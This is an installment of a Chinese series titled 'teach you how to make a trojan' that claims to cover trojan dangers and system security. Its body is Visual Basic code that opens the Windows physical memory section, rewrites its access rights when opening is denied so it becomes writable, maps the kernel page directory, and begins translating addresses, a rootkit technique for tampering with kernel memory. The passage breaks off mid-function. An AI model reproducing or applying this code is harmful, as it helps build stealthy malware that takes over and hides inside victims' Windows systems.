教你如何做木马(20)

主要是讲解木马的危险和系统安全

Attributes.RootDirectory = 0

Attributes.ObjectName = VarPtr(PhysmemString)

Attributes.Attributes = 0

Attributes.SecurityDescriptor = 0

Attributes.SecurityQualityOfService = 0

Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes) If Status = STATUS_ACCESS_DENIED Then

Status = ZwOpenSection(g_hMPM,

READ_CONTROL Or WRITE_DAC, Attributes)

SetPhyscialMemorySectionCanBeWrited g_hMPM

CloseHandle g_hMPM

Status = ZwOpenSection(g_hMPM, SECTION_MAP_READ Or SECTION_MAP_WRITE, Attributes) End If

Dim lDirectoty As Long

verinfo.dwOSVersionInfoSize = Len(verinfo)

If (GetVersionEx(verinfo)) <> 0 Then

If verinfo.dwPlatformId = 2 Then

If verinfo.dwMajorVersion = 5 Then

Select Case verinfo.dwMinorVersion

Case 0

lDirectoty = &H30000

Case 1

lDirectoty = &H39000

End Select

End If

End If

End If If Status = 0 Then

g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, 4, 0, lDirectoty, &H1000)

If g_pMapPhysicalMemory <> 0 Then OpenPhysicalMemory = g_hMPM

End If End Function

Private Function LinearToPhys(BaseAddress As Long, addr As Long) As Long

Dim VAddr As Long, PGDE As Long, PTE As Long, PAddr As Long

Dim lTemp As Long

VAddr = addr

CopyMemory aByte(0), VAddr, 4

lTemp = Fix(ByteArrToLong(aByte) / (2 ^ 22))

PGDE = BaseAddress + lTemp * 4

CopyMemory PGDE, ByVal PGDE, 4 If (PGDE And 1) <> 0 Then

lTemp = PGDE And &H80

If lTemp <> 0 Then

PAddr = (PGDE And &HFFC00000) + (VAddr And &H3FFFFF)

Else